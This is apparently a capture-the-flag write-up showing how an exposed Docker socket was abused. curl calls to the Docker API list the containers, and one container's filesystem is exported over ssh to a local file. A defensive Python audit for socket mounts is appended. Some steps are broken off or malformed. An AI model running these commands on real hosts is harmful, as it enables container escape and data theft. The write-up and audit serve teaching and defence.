By Yaakov Cohen


We connected to the server, and after poking around a bit we saw that they had left docker.sock open. Let's see what information we can get.

Running curl --unix-socket /var/run/docker.sock http/containers/json?all=1 gave us a list of 4 containers. Only the first one was relevant:

    "Status":"Exited (0) 9 seconds ago",




Since the system was read-only, we could not save the export on the server, so we ran the next step from our own command line and redirected the output to a local file:

ssh [email protected] -p 2222 "curl --unix-socket /var/run/docker.sock http:/v1.24/containers/7fbd7d717462b5510a0066a4e33884e6b73877e837379bf1c196679c7f504825/export" > galf.tar

The long number is the Id of the container we are trying to extract; galf is flag in reverse.

After the file finished downloading we extracted it and found a bash script named


ls -la /home/flag_is_here

In /home/flag_is_here we found flag.txt: BSidesTLV{i_am_r34dy_t0_esc4p3_th3_d0ck3r!}
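
The root cause above is a container that can reach docker.sock. As an added example (not part of the original write-up), the following audit takes the JSON returned by the same /containers/json?all=1 call, run by an administrator on the Docker host, and reports every container that has the socket mounted. The sample data, container names and the socket_mounts helper are constructed for illustration.

```python
import json

# Host paths under which the Docker socket is commonly found (assumption).
DOCKER_SOCK_PATHS = ("/var/run/docker.sock", "/run/docker.sock")

# Constructed sample shaped like a /containers/json?all=1 response;
# it is not the output from the challenge server.
SAMPLE = json.loads("""[
 {"Id": "aaa111", "Names": ["/web"], "State": "running",
  "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
              "Destination": "/var/run/docker.sock", "RW": true}]},
 {"Id": "bbb222", "Names": ["/monitor"], "State": "running",
  "Mounts": [{"Type": "bind", "Source": "/run/docker.sock",
              "Destination": "/docker.sock", "RW": false}]},
 {"Id": "ccc333", "Names": ["/db"], "State": "exited",
  "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/db/_data",
              "Destination": "/data", "RW": true}]}
]""")


def socket_mounts(containers):
    """Return one finding per container that has the Docker socket mounted."""
    findings = []
    for c in containers:
        for m in c.get("Mounts") or []:
            if m.get("Source") not in DOCKER_SOCK_PATHS:
                continue
            names = c.get("Names") or [c.get("Id", "?")]
            findings.append({
                "name": names[0].lstrip("/"),
                "state": c.get("State"),
                "destination": m.get("Destination"),
                # Reported for context only: a read-only bind mount still
                # allows connecting to the socket, so it is flagged as well.
                "rw": bool(m.get("RW")),
            })
    return findings


if __name__ == "__main__":
    for f in socket_mounts(SAMPLE):
        print(f"{f['name']} ({f['state']}): docker.sock at "
              f"{f['destination']} rw={f['rw']}")
```

Any container this reports can list and export the other containers on the host exactly as shown in the steps above.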